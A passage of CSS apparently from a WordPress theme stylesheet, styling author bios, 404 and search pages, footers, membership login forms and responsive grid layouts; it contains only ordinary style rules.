max-width: 620px; margin-right: auto; margin-left: auto; border-radius: var(--round-5); background-color: var(--solid-white); -webkit-box-shadow: 0 0 40px var(--shadow-12) !important; box-shadow: 0 0 40px var(--shadow-12) !important; } .search-empty { max-width: 500px; min-height: 35vh; margin-top: 30px; margin-right: auto; margin-left: auto; text-align: center; color: var(--meta-fcolor); } .author-header-inner .breadcrumb-wrap { margin-bottom: 15px; } .bio-title { text-decoration-line: underline; text-decoration-style: dotted; text-decoration-thickness: 3px; text-decoration-color: var(--g-color); } .bio-description { font-size: var(--rem-small); display: block; max-width: 720px; margin-top: 12px; } .ubio, .ubio-inner { display: flex; align-items: center; flex-flow: row nowrap; flex-grow: 1; } .bio-content .usocials { margin-top: 12px; } .bio-avatar { position: relative; display: flex; overflow: hidden; flex-flow: column nowrap; flex-shrink: 0; width: 100px; height: 100px; margin-right: 20px; padding: 4px; border-radius: 100%; } .bio-avatar img { display: block; width: 100%; height: 100%; border-radius: 100%; } .bio-count-posts { display: flex; align-items: flex-end; flex-flow: column nowrap; justify-content: flex-end; padding-left: 20px; } .ef-label:not(:first-child):before { margin-right: 5px; margin-left: 5px; content: '/'; opacity: .5; } .bio-avatar:before { position: absolute; top: 0; left: 0; display: block; width: 100%; height: 100%; content: ''; border-top: 2px solid; border-radius: 100%; } /* ----------------- 11 - Pages ----------------- */ .single-page .s-ct { padding-bottom: 25px; } .page-header, .page-header-content { position: relative; display: block; } .page-header-content { z-index: 1; } .page-header-1 { margin-bottom: 30px; padding-top: 30px; } .page-header-1 .page-featured img { border-radius: var(--round-5); } .page-header-2 { overflow: hidden; margin-bottom: 25px; padding-top: 40px; padding-bottom: 40px; } .page-featured-overlay { position: absolute; top: 0; right: 0; bottom: 0; left: 0; display: block; } .page-featured-overlay img { width: 100%; height: 100%; object-fit: cover; } .page-header-2 .s-title { margin-bottom: 10px; } .page-header-content > *:last-child { margin-bottom: 0; } .page404-wrap { display: flex; align-items: center; width: 100%; min-height: 70vh; } .page404-inner { display: block; width: 100%; padding-top: 30px; padding-bottom: 30px; } .page404-featured { display: block; margin-bottom: 40px; text-align: center; } .page404-featured img { width: auto; max-height: 300px; } .page404-inner > *:not(.page404-featured) { max-width: 700px; margin-right: auto; margin-left: auto; text-align: center; } .page404-inner .page-title, .page404-inner .page404-description { margin-bottom: 20px; } .page404-description { color: var(--meta-fcolor); } .page404-inner > .search-form { max-width: 550px; margin-bottom: 20px; } .page404-btn-wrap { padding-top: 10px; } .section-empty-inner { max-width: 720px; padding: 50px 0; } .section-empty-inner .page-title { position: relative; margin-bottom: 12px; padding-bottom: 15px; } .section-empty-inner .page-title:after { position: absolute; bottom: 0; left: 0; display: block; width: 20%; max-width: 200px; height: 5px; content: ''; border-radius: var(--round-5); background-color: var(--g-color); } /* ----------------- 12 - Footer ----------------- */ .footer-copyright { position: relative; display: block; } .footer-copyright .copyright * { font-size: inherit; } .bottom-footer-section { display: flex; align-items: center; flex-flow: row nowrap; flex-basis: 100%; padding-top: 15px; padding-bottom: 15px; } .footer-bottom-centered .bottom-footer-section { flex-flow: column nowrap; } .footer-bottom-centered .footer-social-list { margin-top: 10px; margin-right: auto; margin-left: auto; } .footer-bottom-centered .footer-social-list-title { display: none; } .footer-bottom-centered .footer-social-list > * { margin-left: 0; padding: 0 7px; } .footer-col .w-widget { margin-bottom: 40px; } .footer-logo { display: flex; flex-grow: 0; flex-shrink: 0; height: var(--flogo-height, 50px); } .footer-logo img { width: auto; max-height: 100%; object-fit: contain; } .footer-social-list { display: flex; align-items: center; flex-flow: row nowrap; margin-left: auto; } .footer-social-list-title { line-height: 1; padding-right: 12px; border-right: 1px solid var(--flex-gray-15); } .footer-social-list > * { margin-left: 12px; } .copyright-inner { font-size: var(--meta-fsize); display: flex; flex-flow: row nowrap; padding: 15px 0; border-top: 1px solid var(--flex-gray-15); } .footer-etemplate .copyright-inner { border-top: none; } .copyright-inner > *:last-child:is(.copyright) { margin-right: auto; margin-left: auto; } .copyright { opacity: .7; } .copyright-menu { display: flex; flex-flow: row nowrap; flex-grow: 0; margin-left: auto; } .copyright-menu > li { line-height: 1; position: relative; display: flex; align-items: center; } .copyright-menu > li:before { position: relative; display: flex; width: 4px; height: 4px; margin-right: 10px; margin-left: 10px; content: ''; opacity: .2; background: currentColor; } .copyright-menu > li:first-child:before { display: none; } .w-sidebar { margin-bottom: 50px; } .w-sidebar .widget-heading, .elementor-widget-container > h5 { margin-bottom: 20px; } .footer-wrap { position: relative; display: block; overflow: hidden; } .footer-wrap:not(.footer-etemplate) > *:first-child:not(.footer-copyright) { padding-top: 50px; } .footer-wrap.left-dot:after { position: absolute; z-index: 0; top: 0; left: 0; display: block; width: 20%; height: 50%; content: ''; opacity: .2; background-image: radial-gradient(var(--body-fcolor) .75px, transparent .75px); background-size: 16px 16px; } [data-theme='dark'] .footer-wrap.left-dot:after { opacity: .12; } footer.top-border { border-top: 1px solid var(--flex-gray-15); } [data-theme='dark'] .footer-etemplate .elementor-shape-fill, [data-theme='dark'] .header-template .elementor-shape-fill { fill: var(--solid-white); } .footer-wrap .widget-heading.heading-layout-10, .footer-wrap .widget-heading.heading-layout-c10, .more-col .widget-heading { opacity: .7; } .footer-col .w-sidebar { margin-bottom: 30px } .footer-col .widget_nav_menu a span { font-size: var(--em-mini); } .footer-columns { position: relative; z-index: 2; } .footer-columns .footer-col { flex-basis: 50%; width: 50%; } .footer-columns .footer-col:first-child, .footer-4c .footer-col:last-child, .footer-3c .footer-col { flex-basis: 100%; width: 100%; } .footer-col .widget:not(.widget-mc) .mc4wp-form-fields input[type='submit'] { padding-right: 15px; padding-left: 15px; } .footer-quote:first-letter { font-size: 1.2em; margin-right: 1px; padding: 0 3px; color: var(--absolute-white); background-color: var(--g-color); } .site-access-inner { display: flex; flex-flow: column nowrap; width: auto; max-width: 600px; padding: 50px; text-align: center; border-radius: var(--round-5); background-color: #d60a3a; box-shadow: 0 5px 30px var(--shadow-12); } .site-access-inner > *:not(:last-child) { margin-bottom: 20px; } .site-access-popup { display: flex; align-items: center; justify-content: center; } .site-access-image svg { width: 100px; } .site-access-btn .is-btn { font-size: 1rem; display: inline-flex; color: var(--dark-accent); background-color: #fff; } .site-access-btn .is-btn:hover { color: #fff; background-color: var(--dark-accent); } .site-access-description { font-size: 1.2rem; } .elementor-widget-text-editor a.h6, .elementor-widget-html a.h6 { text-decoration: underline; text-decoration-color: var(--g-color); } /** membership */ .restrict-box { position: relative; display: block; margin-bottom: 40px; } .restrict-box-inner { position: relative; z-index: 1; display: block; max-width: 560px; margin-right: auto; margin-left: auto; padding: 40px; text-align: center; border-radius: var(--round-5); box-shadow: 0 5px 30px var(--shadow-7); } .restrict-box-inner > *:not(:last-child) { display: block; margin-bottom: 12px; } .restrict-title span, .restrict-desc span, .plan-title span { color: var(--g-color); } .restrict-button-wrap a { font-size: 1.2rem; display: inline-block; padding-top: 10px; padding-bottom: 10px; } .restrict-button-wrap { padding-top: 5px; padding-bottom: 5px; } .restrict-login-link { margin-left: 4px; } #swpm-login-form, #swpm-pw-reset-form, .swpm-registration-widget-form, #swpm-editprofile-form { display: block; max-width: 360px; margin-right: auto; margin-left: auto; padding: 30px 20px; border-radius: var(--round-5); box-shadow: 0 5px 30px var(--shadow-7); } .swpm-login-widget-logged { display: flex; flex-flow: row wrap; max-width: 600px; margin-right: auto; margin-left: auto; padding: 30px 20px; border-radius: var(--round-5); box-shadow: 0 5px 30px var(--shadow-7); } #swpm-editprofile-form, .swpm-registration-widget-form { max-width: 460px; } .swpm-label, .swpm_label, .swpm-registration-widget-form label, #swpm-editprofile-form label { font-size: var(--rem-mini); display: block; margin-bottom: 4px; text-align: left; } .swpm-remember-me { font-size: var(--rem-mini); } input.swpm-text-field { display: block; width: 100%; } .swpm-username-input, .swpm-password-input { margin-bottom: 15px; } .rbct input[type='password'].swpm-text-field { margin-left: 0; } .swpm-login-submit, .swpm-pw-reset-submit-button { margin-top: 20px; margin-bottom: 20px; text-align: center; } input.swpm-login-form-submit { font-size: 1rem; } input[type='submit'].swpm-login-form-submit, input[type='submit'].swpm-pw-reset-submit, input[type='submit'].swpm-registration-submit, input[type='submit'].swpm-edit-profile-submit { font-size: 1rem; padding-right: 40px; padding-left: 40px; } .swpm-registration-submit, .swpm-edit-profile-submit, .swpm-pw-reset-submit { width: 100%; } .swpm-forgot-pass-link, .swpm-join-us-link { display: block; margin-top: 15px; text-align: center; } .swpm-rember-label { color: var(--meta-fcolor); } .swpm-forgot-pass-link #forgot_pass { font-family: var(--meta-family); font-size: var(--meta-fsize); font-weight: var(--meta-fweight); text-decoration: none; opacity: .7; } a.swpm-login-form-register-link { font-size: var(--rem-mini); padding: 5px 12px; text-decoration: none !important; opacity: .7; border: 1px solid; border-radius: var(--round-3); } .swpm-login-form-register-link:hover, .swpm-forgot-pass-link #forgot_pass:hover { opacity: 1; } .swpm-login-action-msg { font-size: var(--rem-small); margin-top: 20px; text-align: center; border-radius: var(--round-5); background: #eeb3541c; } .swpm-registration-widget-form tr, #swpm-editprofile-form tr { display: flex; flex-flow: column nowrap; width: 100%; background: none !important; } #swpm-editprofile-form tbody { display: flex; flex-flow: row wrap; background: none !important; } .swpm-registration-widget-form tr.swpm-registration-membership-level-row, #swpm-editprofile-form .swpm-profile-username-row, #swpm-editprofile-form .swpm-profile-membership-level-row { align-items: center; flex-flow: row nowrap; justify-content: space-between; margin: 5px 0 20px; } .swpm-profile-username-row label, .swpm-registration-membership-level-row label, .swpm-profile-membership-level-row label { margin-bottom: 0; } .swpm-registration-membership-level-row, #swpm-editprofile-form .swpm-profile-membership-level-row, .hide-rego-form-msg { line-height: 1; padding: 15px; border: 1px solid var(--flex-gray-15); border-radius: var(--round-5); } .swpm-profile-username-row td:last-child, .swpm-registration-membership-level-row td:last-child, .swpm-profile-membership-level-row td:last-child { font-size: 1rem; font-weight: 700; text-align: right; text-transform: uppercase; } .swpm-registration-widget-form table, .swpm-registration-widget-form td, #swpm-editprofile-form table, #swpm-editprofile-form td { padding: 0; border: none; } .swpm-registration-widget-form input[type='text'], .swpm-registration-widget-form input[type='password'], #swpm-editprofile-form input[type='text'], #swpm-editprofile-form input[type='password'], .swpm-edit-profile-form select { font-weight: 700; width: 100%; margin: 0; margin-bottom: 15px; } .swpm_error, .swpm_success { font-size: var(--rem-small); display: block; padding: 15px 20px; text-align: center; border-radius: var(--round-5); background-color: #fba0a029; } .swpm_success { background-color: #65b97329; } .swpm_error ul { margin-top: 10px; } #swpm-editprofile-form table { margin-bottom: 0; } .hide-rego-form-msg { font-size: var(--rem-mini); } .swpm-login-widget-logged > *:not(.swpm-edit-profile-link):not(.swpm-logged-logout-link) { display: flex; flex-flow: row nowrap; justify-content: space-between; width: 100%; padding: 5px 0; border-bottom: 1px solid var(--flex-gray-15); } .swpm-login-widget-logged .swpm-edit-profile-link, .swpm-login-widget-logged .swpm-logged-logout-link { display: flex; flex: 0 0 50%; width: 50%; margin-top: 30px; padding-right: 10px; padding-left: 10px; } .swpm-login-widget-logged a { display: inline-block; flex-grow: 1; text-align: center; text-decoration: none !important; } .swpm-edit-profile-link a, .swpm-logged-logout-link a { font-family: var(--btn-family); font-weight: var(--btn-fweight); font-style: var(--btn-fstyle); display: inline-block; flex-grow: 1; padding-top: 7px; padding-bottom: 7px; text-align: center; text-decoration: none !important; letter-spacing: var(--btn-fspace); text-transform: var(--btn-transform); border-radius: var(--round-5); } .swpm-edit-profile-link a { border: 1px solid; } .swpm-logged-logout-link a { color: var(--absolute-white) !important; background-color: var(--g-color); } .swpm-logged-logout-link a:hover { -webkit-box-shadow: 0 4px 15px var(--g-color-90); box-shadow: 0 4px 15px var(--g-color-90); } /* ----------------- 13 - Responsive ----------------- */ @media (min-width: 768px) { .rb-col-2 > .block-inner > * { flex-basis: 50%; width: 50%; } .rb-col-3 > .block-inner > * { flex-basis: 33.33%; width: 33.33%; } .rb-col-4 > .block-inner > * { flex-basis: 25%; width: 25%; } .rb-col-5 > .block-inner > * { flex-basis: 20%; width: 20%; } .rb-col-6 > .block-inner > * { flex-basis: 16.66%; width: 16.66%; } .rb-col-7 > .block-inner > * { flex-basis: 14.25%; width: 14.25%; } .col-border .block-inner > *:after { position: absolute; top: 0; right: 0; bottom: 0; left: auto; width: 1px; height: 100%; content: ''; pointer-events: none; border-right: 1px var(--column-border-style, solid) var(--column-border-color); } .overlay-inner, .overlay-inner .counter-el { padding: 25px 20px; } .p-highlight .p-gradient { padding: 100px 25px 25px 25px; background: linear-gradient(to top, var(--dark-accent) 0, var(--dark-accent-90) calc(100% - 150px), var(--dark-accent-0) 100%); } .p-highlight.p-vtop .p-gradient { padding: 25px 25px 100px 25px; background: linear-gradient(to bottom, var(--dark-accent) 0, var(--dark-accent-90) calc(100% - 150px), var(--dark-accent-0) 100%); } .related-sec.related-1, .related-sec.related-2, .related-sec.related-3, .related-sec.related-4 { float: right; max-width: 350px; margin-left: 1.5rem; padding: 25px; } .related-sec.related-5, .related-sec.related-6 { padding: 30px; } .scroll-holder { overflow-x: hidden; overflow-y: auto; } .list-holder { flex-flow: row-reverse nowrap; } .featured-left .list-holder { flex-flow: row nowrap; } .list-feat-holder { flex-shrink: 0; width: 45%; max-width: 45%; } .p-list-1 .list-feat-holder { width: 40%; max-width: 40%; } .cbox-3 .cbox-featured-overlay { padding-bottom: 125%; } .ecat-bg-1.p-list-1 .feat-holder .p-top, .ecat-big-bg-1.p-list-1 .feat-holder .p-top, .ecat-bg-2.p-list-1 .feat-holder .p-top, .ecat-big-bg-2.p-list-1 .feat-holder .p-top { bottom: 5px; left: -5px; } .list-box .p-featured { -webkit-border-top-left-radius: 0; border-top-left-radius: 0; -webkit-border-bottom-left-radius: 0; border-bottom-left-radius: 0; } .featured-left .list-box .p-featured { border-radius: var(--wrap-border, var(--round-3)) 0 0 var(--wrap-border, var(--round-3)); -webkit-border-top-left-radius: var(--wrap-border, var(--round-3)); -webkit-border-top-right-radius: 0; -webkit-border-bottom-right-radius: 0; -webkit-border-bottom-left-radius: var(--wrap-border, var(--round-3)); } .list-box .list-holder { align-items: stretch; } .p-middle .list-box .list-holder { align-items: center; } .list-box .feat-holder, .list-box .p-featured { height: 100%; } .list-box .p-content { margin-top: var(--box-spacing); margin-bottom: var(--box-spacing); margin-left: var(--box-spacing); } .p-center .list-box .p-content { margin-left: var(--list-holder-spacing, 15px); } .featured-left .list-box .p-content { margin-right: var(--box-spacing); margin-left: 0; } .smeta-in .is-meta > *, .smeta-in .meta-text > *, .review-section .meta-text > *, .spon-qview .sponsor-label, .spon-qview .is-text, .nname-info .nice-name { font-size: 1.15em; } .review-header .rstar i { font-size: 18px; } .comment-form .comment-form-author, .comment-form .comment-form-email, .comment-form .comment-form-url { float: left; width: 33.33%; } .s-ct { padding-bottom: 15px; } .single-page .s-ct { min-height: 45vh; padding-bottom: 40px; } .single-page.none-header .s-ct { min-height: 60vh; margin-top: 50px; } .sfoter-sec { margin-bottom: 50px; } .single-related { padding-top: 40px; } .sidebar-inner .widget { margin-bottom: 40px; } .rbtoc.table-left:not(.table-fw-single-col) { float: left; min-width: 340px; max-width: 50%; margin-right: 30px; margin-bottom: 30px; padding: 25px; } .rbtoc.table-fw { padding: 25px; } .rbtoc.table-fw .inner { display: flex; flex-flow: row wrap; margin-right: -15px; margin-left: -15px; } .rbtoc.table-fw .inner a { flex: 0 0 50%; max-width: 50%; margin: 0; padding: 7px 15px; border: none; } .rbtoc.table-fw .inner a:not(:nth-last-child(1)):not(:nth-last-child(2)):after { position: absolute; right: 15px; bottom: 0; left: 15px; display: block; height: 1px; content: ''; background-color: var(--flex-gray-15); } .grid-masonry .grid-holder { display: grid; grid-template-columns: auto auto auto auto auto auto auto auto; grid-gap: 8px; } .grid-fmasonry .grid-holder { display: grid; grid-template-columns: auto auto auto auto auto auto auto auto auto auto; grid-gap: 10px; } .grid-default .grid-holder.rb-c5 { display: grid; grid-template-columns: auto auto auto auto auto; grid-gap: 10px; } .grid-default .grid-holder.rb-c6 { display: grid; grid-template-columns: auto auto auto auto auto auto; grid-gap: 10px; } .grid-default .grid-holder.rb-c7 { display: grid; grid-template-columns: auto auto auto auto auto auto auto; grid-gap: 10px; } .grid-default .grid-holder.rb-c8 { display: grid; grid-template-columns: auto auto auto auto auto auto auto auto; grid-gap: 10px; } .grid-default .grid-holder.rb-c9 { display: grid; grid-template-columns: auto auto auto auto auto auto auto auto auto; grid-gap: 10px; } .top-footer-inner > *:not(:last-child) { margin-bottom: 50px; } .grid-masonry .grid-el:nth-child(2) { grid-column: 1 / span 2; grid-row: 1 / span 2; } .grid-masonry .grid-el:first-child { height: 100%; grid-column: 3 / span 2; grid-row: 1; } .grid-masonry .grid-el:nth-child(3) { grid-column: 5 / span 2; grid-row: 1 / span 2; } .grid-masonry .grid-el:nth-child(4) { grid-column: 7 / span 1; grid-row: 1; } .grid-masonry .grid-el:nth-child(5) { grid-column: 8 / span 1; grid-row: 1; } .grid-masonry .grid-el:nth-child(6) { grid-column: 3 / span 1; grid-row: 2; } .grid-masonry .grid-el:nth-child(7) { grid-column: 4 / span 1; grid-row: 2; } .grid-masonry .grid-el:nth-child(8) { grid-column: 7 / span 2; grid-row: 2; } .grid-fmasonry .grid-el:nth-child(2) { grid-column: 1; grid-row: 2; } .grid-fmasonry .grid-el:nth-child(3) { grid-column: 2 / span 2; grid-row: 1 / span 2; } .grid-fmasonry .grid-el:nth-child(4) { grid-column: 4 / span 2; grid-row: 1; } .grid-fmasonry .grid-el:nth-child(5) { grid-column: 6 / span 2; grid-row: 1 / span 2; } .grid-fmasonry .grid-el:nth-child(11) { grid-column: 8 / span 2; grid-row: 2; } .grid-masonry .grid-el:first-child .instagram-box, .grid-masonry .grid-el:nth-child(8) .instagram-box, .grid-masonry .grid-el:nth-child(9) .instagram-box, .grid-fmasonry .grid-el:nth-child(4) .instagram-box, .grid-fmasonry .grid-el:nth-child(11) .instagram-box { padding-bottom: 50%; } .is-style-1 .fnicon i, .is-style-2 .fnicon i, .is-style-9 .fnicon i { width: 66px; height: 66px; } .p-middle.p-highlight .p-gradient, .p-middle.p-overlay .p-gradient { padding-top: 0; padding-bottom: 0; background: none; } } @media (min-width: 768px) and (max-width: 1024px) { .rb-tcol-1 > .block-inner > * { flex-basis: 100%; width: 100%; } .rb-tcol-2 > .block-inner > * { flex-basis: 50%; width: 50%; } .rb-tcol-3 > .block-inner > * { flex-basis: 33.33%; width: 33.33%; } .rb-tcol-4 > .block-inner > * { flex-basis: 25%; width: 25%; } .rb-tcol-5 > .block-inner > * { flex-basis: 20%; width: 20%; } .rb-tcol-6 > .block-inner > * { flex-basis: 16.66%; width: 16.66%; } .rb-tcol-2 .block-inner > *:nth-last-child(1), .rb-tcol-2 .block-inner > *:nth-last-child(2), .rb-tcol-3 .block-inner > *:nth-last-child(1), .rb-tcol-3 .block-inner > *:nth-last-child(2), .rb-tcol-3 .block-inner > *:nth-last-child(3), .rb-tcol-4 .block-inner > *:nth-last-child(1), .rb-tcol-4 .block-inner > *:nth-last-child(2), .rb-tcol-4 .block-inner > *:nth-last-child(3), .rb-tcol-4 .block-inner > *:nth-last-child(4), .rb-tcol-5 .block-inner > *:nth-last-child(1), .rb-tcol-5 .block-inner > *:nth-last-child(2), .rb-tcol-5 .block-inner > *:nth-last-child(3), .rb-tcol-5 .block-inner > *:nth-last-child(4), .rb-tcol-5 .block-inner > *:nth-last-child(5), .rb-tcol-6 .block-inner > *:nth-last-child(1), .rb-tcol-6 .block-inner > *:nth-last-child(2), .rb-tcol-6 .block-inner > *:nth-last-child(3), .rb-tcol-6 .block-inner > *:nth-last-child(4), .rb-tcol-6 .block-inner > *:nth-last-child(5), .rb-tcol-6 .block-inner > *:nth-last-child(6) { margin-bottom: 0; } .rb-tcol-2.no-last-bb .block-inner > *:nth-last-child(1), .rb-tcol-2.no-last-bb .block-inner > *:nth-last-child(2), .rb-tcol-3.no-last-bb .block-inner > *:nth-last-child(1), .rb-tcol-3.no-last-bb .block-inner > *:nth-last-child(2), .rb-tcol-3.no-last-bb .block-inner > *:nth-last-child(3), .rb-tcol-4.no-last-bb .block-inner > *:nth-last-child(1), .rb-tcol-4.no-last-bb .block-inner > *:nth-last-child(2), .rb-tcol-4.no-last-bb .block-inner > *:nth-last-child(3), .rb-tcol-4.no-last-bb .block-inner > *:nth-last-child(4), .rb-tcol-5.no-last-bb .block-inner > *:nth-last-child(1), .rb-tcol-5.no-last-bb .block-inner > *:nth-last-child(2), .rb-tcol-5.no-last-bb .block-inner > *:nth-last-child(3), .rb-tcol-5.no-last-bb .block-inner > *:nth-last-child(4), .rb-tcol-5.no-last-bb .block-inner > *:nth-last-child(5), .rb-tcol-6.no-last-bb .block-inner > *:nth-last-child(1), .rb-tcol-6.no-last-bb .block-inner > *:nth-last-child(2), .rb-tcol-6.no-last-bb .block-inner > *:nth-last-child(3), .rb-tcol-6.no-last-bb .block-inner > *:nth-last-child(4), .rb-tcol-6.no-last-bb .block-inner > *:nth-last-child(5), .rb-tcol-6.no-last-bb .block-inner > *:nth-last-child(6) { padding-bottom: 0; --bottom-border-color: transparent; } .col-border.rb-tcol-1 > .block-inner > *:after, .col-border.rb-tcol-2 > .block-inner > *:nth-child(2n):after, .col-border.rb-tcol-3 > .block-inner > *:nth-child(3n):after, .col-border.rb-tcol-4 > .block-inner > *:nth-child(4n):after, .col-border.rb-tcol-5 > .block-inner > *:nth-child(5n):after, .col-border.rb-tcol-6 > .block-inner > *:nth-child(6n):after, .col-border.rb-tcol-7 > .block-inner > *:nth-child(7n):after { border-right: none; } .is-sidebar { max-width: 420px; margin-right: auto; margin-left: auto; } body .tablet-hide, body .tablet-hide + .spacing { display: none; } .meta-el:not(.tablet-hide) + .meta-el:not(.tablet-hide):before { display: inline-flex; width: 3px; height: 3px; margin-right: .6em; margin-left: .6em; content: ''; opacity: .5; border-radius: 100%; background-color: currentColor; } } @media (min-width: 992px) { .grid-container { flex-flow: row nowrap; } .grid-container > *:nth-child(1) { flex: 0 0 66.67%; width: 66.67%; } .grid-container > *:nth-child(2) { flex: 0 0 33.33%; width: 33.33%; } .is-sidebar-left .grid-container { flex-direction: row-reverse; } .without-sidebar .grid-container > * { flex: 0 0 100%; width: 100%; } .single-time-read > *, .t-shared-header span { font-size: 1.15em; } body .s-cats.custom-size .p-category { font-size: var(--single-category-fsize); } } /** desktop */ @media (min-width: 1025px) { .col-border.rb-col-1 > .block-inner > *:after, .col-border.rb-col-2 > .block-inner > *:nth-child(2n):after, .col-border.rb-col-3 > .block-inner > *:nth-child(3n):after, .col-border.rb-col-4 > .block-inner > *:nth-child(4n):after, .col-border.rb-col-5 > .block-inner > *:nth-child(5n):after, .col-border.rb-col-6 > .block-inner > *:nth-child(6n):after, .col-border.rb-col-7 > .block-inner > *:nth-child(7n):after { border-right: none; } .header-transparent { position: absolute; z-index: 100; top: 0; left: 0; width: 100%; } body:not(.sticky-on) .header-transparent .main-menu > li > a, body:not(.sticky-on) .header-transparent .main-menu > li > a .menu-sub-title, body:not(.sticky-on) .header-transparent .more-trigger, body:not(.sticky-on) .header-transparent .navbar-right > *, body:not(.sticky-on) .header-transparent .is-text-logo .logo-title > *, html:not(.collapse-activated) body:not(.sticky-on) .header-transparent .header-mobile-wrap .is-text-logo .logo-title > *, html:not(.collapse-activated) body:not(.sticky-on) .header-transparent .header-mobile-wrap .navbar-right > * { color: var(--transparent-nav-color, var(--nav-color)); } body:not(.sticky-on) .header-transparent .dark-mode-toggle-wrap:not(:first-child) .dark-mode-toggle { border-color: #ffffff20; } .header-transparent .dark-mode-slide-btn.mode-icon-default { color: var(--body-fcolor); } body:not(.sticky-on) .header-transparent .navbar-inner .logo-default, body:not(.sticky-on) .header-transparent .navbar-inner .logo-dark, body .navbar-inner .logo-transparent { display: none; } body:not(.sticky-on) .header-transparent .logo-default { display: none; } body:not(.sticky-on) .navbar-inner .logo-transparent { display: block; } .yes-hd-transparent.is-standard-2 .header-transparent, .yes-hd-transparent.is-audio-2 .header-transparent, .yes-hd-transparent.is-video-2 .header-transparent { background-color: var(--dark-accent); } .heading-title > * { font-size: var(--heading-size-desktop, var(--heading-fsize, inherit)); } .format-style-bottom.format-size-big .p-format { padding: 10px 7px 7px 10px; } .format-style-bottom.format-size-big .p-format i { font-size: 24px; } .format-style-bottom.format-size-big .p-format .gallery-count { top: 5px; right: 5px; } .format-style-top.format-size-big .p-format i { font-size: 30px; } .format-style-center.format-size-big .post-format { font-size: 60px; } .format-style-top.format-size-big .gallery-count { font-size: 1rem; padding: 5px; } .hrc-3 .p-link { padding-bottom: 3px; } .block-hrc .p-wrap:first-child, .hrc-3 .sub-section { --bottom-spacing: 25px; } .rb-col-6 .cbox-featured { margin-bottom: 10px; } .p-meta.has-avatar { padding-top: 2px; } .meta-avatar { margin-right: 7px; } .p-link { padding-top: 5px; } .admin-bar .reading-indicator { top: 32px; } .s-feat-outer { margin-bottom: 40px; } .breadcrumb-absolute { padding: 10px 20px; } .s-hl-heading.h1 { font-size: 3.5rem; top: -15px; } .single-standard-1 .single-header { padding-top: 20px; padding-bottom: 10px; } .single-standard-1 .s-feat img { width: auto; max-width: 100%; } .single-standard-2 .single-header { margin-bottom: 40px; } .single-standard-7 .single-header { margin-bottom: 40px; } .single-standard-8 .grid-container { margin-top: 40px; } .single-standard-6 .single-header { margin-bottom: 40px; } .single-standard-2 .single-header-inner { padding-top: 40px; } .single-standard-3 .single-header, .single-standard-4 .single-header { padding-top: 10px; padding-bottom: 40px; } .single-standard-5 .single-header { padding-bottom: 40px; } .single-embed-2 .embed-audio .embed-holder, .single-embed-3 .embed-audio .embed-holder, .single-embed-4 .embed-audio .embed-holder { padding-bottom: 20%; } .single-embed-4 .single-header { margin-bottom: 40px; } .single-header-content { padding-right: 30px; padding-left: 30px; } .s-title, .s-tagline, .s-breadcrumb { margin-bottom: 20px; } .spon-qview { padding: 7px 20px; } .single-meta { margin-bottom: 30px; } .single .single-no-featured .single-header { margin-bottom: 30px; } .archive-header { padding-top: 40px; padding-bottom: 40px; } .archive-header.category-header-2 { margin-bottom: 50px; padding-top: 90px; padding-bottom: 90px; } .yes-hd-transparent .archive-header.category-header-2 { padding-top: calc(100px + var(--nav-height)); } .archive-header-content > *:not(:last-child) { margin-bottom: 20px; } .category-header-2 .block-qlinks { padding-top: 5px; } .blog-wrap { margin-top: 50px; margin-bottom: 50px; } .blog-wrap .block-h { margin-bottom: 25px; } .search-header { padding-top: 50px; } .yes-hd-transparent .search-header { padding-top: 110px; } .ecat-bg-1.ecat-size-big .p-top { padding-bottom: 3px; } .ecat-bg-1.ecat-size-big .feat-holder .p-top { padding-bottom: 0; } .ecat-bg-1.ecat-size-big .p-category, .ecat-bg-2.ecat-size-big .p-category, .ecat-bg-3.ecat-size-big .p-category, .ecat-border.ecat-size-big .p-category { font-size: 1.15em; padding: 8px 16px; } .ecat-bg-4.ecat-size-big .p-category { font-size: 1.15em; } .ecat-text.ecat-size-big .p-category, .ecat-b-border.ecat-size-big .p-category { font-size: 1.3em; } .ecat-b-dotted.ecat-size-big .p-category { font-size: 1.15em; border-bottom-width: 4px; } .meta-el:before { display: inline-flex; width: 3px; height: 3px; margin-right: .6em; margin-left: .6em; content: ''; opacity: .5; border-radius: 100%; background-color: currentColor; } .bookmark-section-header-image { flex-shrink: 0; height: 45px; } .empty-saved { margin-top: 30px; margin-bottom: 30px; } .plist-item-thumb { width: 125px; } .author-header-inner .breadcrumb-wrap { margin-bottom: 20px; } .search-header-form .search-form, .page404-inner .search-form { font-size: 1.5rem; } .search-header-form .search-form input[type='search'], .page404-inner .search-form input[type='search'] { padding: 20px 20px 20px 5px; } .search-header-form .search-form-icon, .page404-inner .search-form-icon { padding-right: 15px; padding-left: 15px; } .search-header-content { margin-bottom: 40px; } .search-empty { margin-top: 50px; } #back-top { bottom: 40px; } .logged-welcome { display: inline-flex; } .page404-btn-wrap { padding-top: 20px; } .page-header-1 { margin-bottom: 40px; padding-top: 40px; } .page-header-2 { margin-bottom: 40px; padding-top: 100px; padding-bottom: 100px; } .page-header-2 .s-title { margin-bottom: 15px; } .page404-inner { padding-top: 60px; padding-bottom: 60px; } .page404-inner .page-title, .page404-inner .page404-description { margin-bottom: 25px; } .page404-inner input[type='search'] { font-size: 1rem; min-height: 54px; } .share-action.is-mobile { display: none; } .share-action.is-web { display: flex; display: -webkit-flex; } .sticky-sidebar .sidebar-inner { position: -webkit-sticky; position: sticky; top: 12px; padding-bottom: 12px; -webkit-transition: all .3s ease; transition: all .3s ease; will-change: top; } .admin-bar .sticky-sidebar .sidebar-inner, .admin-bar .l-shared-sec, .admin-bar .rb-sticky > * { top: 44px; } .sticky-on .sticky-sidebar .sidebar-inner, .sticky-on .l-shared-sec, .sticky-on .rb-sticky > * { top: calc(var(--nav-height) + 12px); } .sticky-on.admin-bar .sticky-sidebar .sidebar-inner, .sticky-on.admin-bar .l-shared-sec, .sticky-on.admin-bar .rb-sticky > * { top: calc(var(--nav-height) + 44px); } .admin-bar.sticky-on.is-mstick .sticky-holder, .admin-bar.sticky-on .e-section-sticky { margin-top: 32px; } .collapse-footer { padding: 20px; } .review-header .rstar-bg { background-image: linear-gradient(to right, var(--review-color) 96.5%, transparent 3.5%); background-size: 29px 28px; } .e-ct-outer > * { margin-bottom: 35px; } .s-hl { padding-bottom: 35px; } .yes-tstick.sticky-on .main-menu-wrap, .yes-tstick.sticky-on .e-stitle-sticky .elementor-widget-foxiz-mini-cart, .yes-tstick.sticky-on .e-stitle-sticky .elementor-widget-foxiz-notification-icon, .yes-tstick.sticky-on .e-stitle-sticky .elementor-widget-foxiz-login-icon, .yes-tstick.sticky-on .e-stitle-sticky .elementor-widget-foxiz-social-list, 